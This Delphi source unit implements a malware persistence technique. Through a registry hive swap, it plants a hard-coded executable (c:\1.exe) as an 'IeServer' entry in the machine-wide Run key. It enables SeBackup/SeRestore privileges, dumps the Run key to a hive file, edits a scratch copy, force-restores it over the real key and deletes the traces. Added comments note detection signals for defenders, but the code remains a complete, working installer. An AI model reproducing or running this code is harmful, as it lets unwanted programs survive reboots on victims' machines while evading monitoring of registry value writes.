unit Unit1;
interface
uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls;
type
  { Main form. It holds a single button; its click handler (Button1Click,
    defined in the implementation section) kicks off the registry write. }
  TForm1 = class(TForm)
    Button1: TButton;
    procedure Button1Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;
var Form1: TForm1; // global form instance; presumably auto-created from the project (.dpr) — not visible here
implementation
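{$R *.dfm}

{ Enables SeBackupPrivilege in the current process token so that RegSaveKey
  (used by SaveKey2) is allowed to dump a registry key to a hive file.

  SeBackupPrivilege (from the original comment): "back up files and
  directories" - lets the holder bypass file/directory permissions through
  the NTFS backup API; by default held by Administrators and Backup Operators.
  A token that does not already hold the privilege cannot gain it here:
  AdjustTokenPrivileges then returns TRUE but sets ERROR_NOT_ALL_ASSIGNED.

  Side effects: modifies the current process token only.

  Fixes over the original: the token handle was never closed (leak), and the
  results of OpenProcessToken / LookupPrivilegeValue were ignored, so an
  uninitialised handle or LUID could be handed to AdjustTokenPrivileges.
  The signature is unchanged (no return value); callers detect failure via
  the registry call that follows. }
procedure SetPrivilege;
const
  ADJUST_PRIV = TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES;
  BACKUP_PRIV = 'SeBackupPrivilege';
  PRIV_SIZE = SizeOf(TTokenPrivileges);
var
  TokenPriv, Previous: TTokenPrivileges;
  Token: THandle;
  ReturnLen: DWORD;
begin
  Token := 0;
  if not OpenProcessToken(GetCurrentProcess, ADJUST_PRIV, Token) then
    Exit;
  try
    // nil system name = resolve the privilege LUID on the local machine
    if not LookupPrivilegeValue(nil, BACKUP_PRIV, TokenPriv.Privileges[0].Luid) then
      Exit;
    TokenPriv.PrivilegeCount := 1;
    TokenPriv.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    // A TRUE result does not prove the privilege is now enabled; a caller that
    // needs certainty must inspect GetLastError for ERROR_NOT_ALL_ASSIGNED.
    AdjustTokenPrivileges(Token, False, TokenPriv, PRIV_SIZE, Previous, ReturnLen);
  finally
    CloseHandle(Token);
  end;
end;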
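{ Enables SeRestorePrivilege in the current process token so that
  RegRestoreKey (used by regstore2) may overwrite a registry key from a
  hive file.

  SeRestorePrivilege (from the original comment): "restore files and
  directories" - lets the holder bypass file/directory permissions when
  restoring backed-up files; by default held by Administrators and Backup
  Operators. As with SetPrivilege, a token that lacks the privilege cannot
  acquire it here (ERROR_NOT_ALL_ASSIGNED).

  Fixes over the original: the token is opened with only the rights the
  adjustment needs (TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES) instead of
  TOKEN_ALL_ACCESS; CloseHandle is no longer invoked on an uninitialised
  handle when OpenProcessToken fails; the handle is closed on every path. }
procedure SetPrivilege2;
const
  RESTORE_PRIV = 'SeRestorePrivilege';
  ADJUST_PRIV = TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES;
var
  Wanted, Previous: TTokenPrivileges;
  TokenHandle: THandle;
  ReturnLen: DWORD;
  Luid: TLargeInteger;
begin
  TokenHandle := 0;
  if not OpenProcessToken(GetCurrentProcess, ADJUST_PRIV, TokenHandle) then
    Exit;
  try
    if LookupPrivilegeValue(nil, RESTORE_PRIV, Luid) then
    begin
      Wanted.PrivilegeCount := 1;
      Wanted.Privileges[0].Luid := Luid;
      Wanted.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
      // Result deliberately not surfaced: the procedure has no return value.
      AdjustTokenPrivileges(TokenHandle, False, Wanted, SizeOf(Previous), Previous, ReturnLen);
    end;
  finally
    CloseHandle(TokenHandle);
  end;
end;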
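{ Creates (or opens) key\subkey and writes `name` as a REG_EXPAND_SZ value
  containing `value`.

  Returns True only when RegSetValueEx reports ERROR_SUCCESS.

  Fixes over the original: RegCreateKey's result is now checked, so a failed
  create no longer leads to RegSetValueEx and RegCloseKey being called on an
  uninitialised handle; and the byte count given to RegSetValueEx includes
  the terminating null (required for REG_SZ/REG_EXPAND_SZ data) and is
  computed in bytes, not characters, so it is also correct when Char is
  two bytes wide. }
function addreg(key: HKEY; subkey, name, value: string): Boolean;
var
  regkey: HKEY;
  dataBytes: DWORD;
begin
  Result := False;
  regkey := 0;
  if RegCreateKey(key, PChar(subkey), regkey) <> ERROR_SUCCESS then
    Exit;
  try
    // +1 for the terminating null; PChar(value) always points at a
    // null-terminated buffer, even for an empty string.
    dataBytes := (Length(value) + 1) * SizeOf(Char);
    Result := RegSetValueEx(regkey, PChar(name), 0, REG_EXPAND_SZ,
                            PChar(value), dataBytes) = ERROR_SUCCESS;
  finally
    RegCloseKey(regkey);
  end;
end;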
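{ Dumps the registry key `subkey` under HKEY_CURRENT_USER (key = 1) or
  HKEY_LOCAL_MACHINE (any other value) into the hive file `filename` with
  RegSaveKey.

  Returns True iff RegSaveKey reports ERROR_SUCCESS.

  RegSaveKey needs SeBackupPrivilege, so SetPrivilege is called first; the
  save still fails if the process token does not hold that privilege.
  RegSaveKey does not overwrite: if `filename` already exists the call
  fails (callers in this unit delete the hive files when they are done).

  Fixes over the original: the handle is initialised and RegOpenKey's
  return code is checked, so a failed open can no longer leave `SKey`
  holding garbage that is then passed to RegSaveKey and RegCloseKey. }
function SaveKey2(key: Integer; subkey, filename: string): Boolean;
var
  SKey: HKEY;
  root: HKEY;
begin
  SetPrivilege;
  Result := False;
  SKey := 0;
  if key = 1 then
    root := HKEY_CURRENT_USER
  else
    root := HKEY_LOCAL_MACHINE;
  if RegOpenKey(root, PChar(subkey), SKey) <> ERROR_SUCCESS then
    Exit;
  try
    // nil security attributes: the hive file gets a default DACL
    Result := RegSaveKey(SKey, PChar(filename), nil) = ERROR_SUCCESS;
  finally
    RegCloseKey(SKey);
  end;
end;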
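{ Overwrites the registry key `subkey` under HKEY_CURRENT_USER (key = 1) or
  HKEY_LOCAL_MACHINE (otherwise) with the contents of the hive file `hfile`
  via RegRestoreKey. The flag value 8 is REG_FORCE_RESTORE: the key is
  replaced even while other handles to it are open. RegRestoreKey needs
  SeRestorePrivilege, hence the SetPrivilege2 call.

  Note for defenders: regstore uses this to restore a hive onto
  HKLM\...\Run, which replaces the whole key in one call rather than
  writing a value; RegSaveKey/RegRestoreKey activity against autostart
  keys, combined with SeBackup/SeRestore privilege enabling, is a usable
  detection signal.

  Fixes over the original: the handle is initialised and RegOpenKey's
  return code is checked, so neither RegRestoreKey nor RegCloseKey is
  reached with an uninitialised handle. The RegRestoreKey result is still
  not reported (the procedure signature is unchanged); callers retry
  blindly. }
procedure regstore2(key: Integer; subkey, hfile: string);
const
  FORCE_RESTORE = 8; // REG_FORCE_RESTORE
var
  target: HKEY;
  root: HKEY;
begin
  SetPrivilege2;
  if key = 1 then
    root := HKEY_CURRENT_USER
  else
    root := HKEY_LOCAL_MACHINE;
  target := 0;
  if RegOpenKey(root, PChar(subkey), target) <> ERROR_SUCCESS then
    Exit;
  try
    RegRestoreKey(target, PChar(hfile), FORCE_RESTORE);
  finally
    RegCloseKey(target);
  end;
end;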
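{ Installs `exefile` as the "IeServer" autostart value of
  HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run without ever calling
  RegSetValueEx on that key. Sequence (unchanged from the original):
    1. dump the live HKLM Run key to c:\1.hiv (SaveKey2);
    2. create the scratch key HKCU\Software\fengzi and restore c:\1.hiv
       onto it (regstore2);
    3. add IeServer=exefile to the scratch key with addreg;
    4. dump the scratch key to c:\2.hiv and force-restore that hive onto the
       real HKLM Run key (regstore2, REG_FORCE_RESTORE);
    5. delete the scratch key and both hive files.
  Each restore is attempted five times; no result is checked, so the
  repetition reads as a blind retry - its rationale is not recorded.

  Security notes for reviewers: this is a registry hive swap - a persistence
  technique that lands a Run entry through RegSaveKey/RegRestoreKey
  (SeBackupPrivilege/SeRestorePrivilege) instead of a value write. It needs
  a token that already holds those privileges and leaves short-lived .hiv
  files in C:\; both are detection opportunities. Because the restore
  replaces the entire Run key with the snapshot, any value written to it by
  anything else between steps 1 and 4 is lost.

  Fixes over the original: the scratch-key handle is initialised and the
  RegCreateKey result is checked so RegCloseKey never receives an
  uninitialised handle; the path literals split by line wrapping in the
  listing ("CurrentV ersion", "Micro soft") are restored to their obvious
  values. Every other step, including the blind retries, is kept. }
procedure regstore(exefile: string);
const
  RUN_KEY = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run';
  SCRATCH_KEY = 'Software\fengzi';
  HIVE_A = 'c:\1.hiv';
  HIVE_B = 'c:\2.hiv';
  RETRIES = 5;
var
  scratch: HKEY;
  created: Boolean;
  i: Integer;
begin
  // 1. snapshot the real Run key (key = 2 selects HKLM)
  SaveKey2(2, RUN_KEY, HIVE_A);

  // 2. scratch key under HKCU, then overwrite it with the snapshot
  scratch := 0;
  created := RegCreateKey(HKEY_CURRENT_USER, SCRATCH_KEY, scratch) = ERROR_SUCCESS;
  for i := 1 to RETRIES do
    regstore2(1, SCRATCH_KEY, HIVE_A);

  // 3. add the autostart value to the scratch copy
  addreg(HKEY_CURRENT_USER, SCRATCH_KEY, 'IeServer', exefile);

  // 4. dump the modified copy and force it onto the real Run key
  SaveKey2(1, SCRATCH_KEY, HIVE_B);
  for i := 1 to RETRIES do
    regstore2(2, RUN_KEY, HIVE_B);

  // 5. clean up: scratch key (deleted while its handle is still open, as in
  //    the original) and both hive files
  RegDeleteKey(HKEY_CURRENT_USER, SCRATCH_KEY);
  if created then
    RegCloseKey(scratch);
  DeleteFile(HIVE_A);
  DeleteFile(HIVE_B);
end;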
{ Button handler: runs the hive-swap installer (regstore) for the hard-coded
  payload path c:\1.exe. Sender is unused. }
procedure TForm1.Button1Click(Sender: TObject);
const
  PAYLOAD = 'c:\1.exe';
begin
  regstore(PAYLOAD);
end;
end.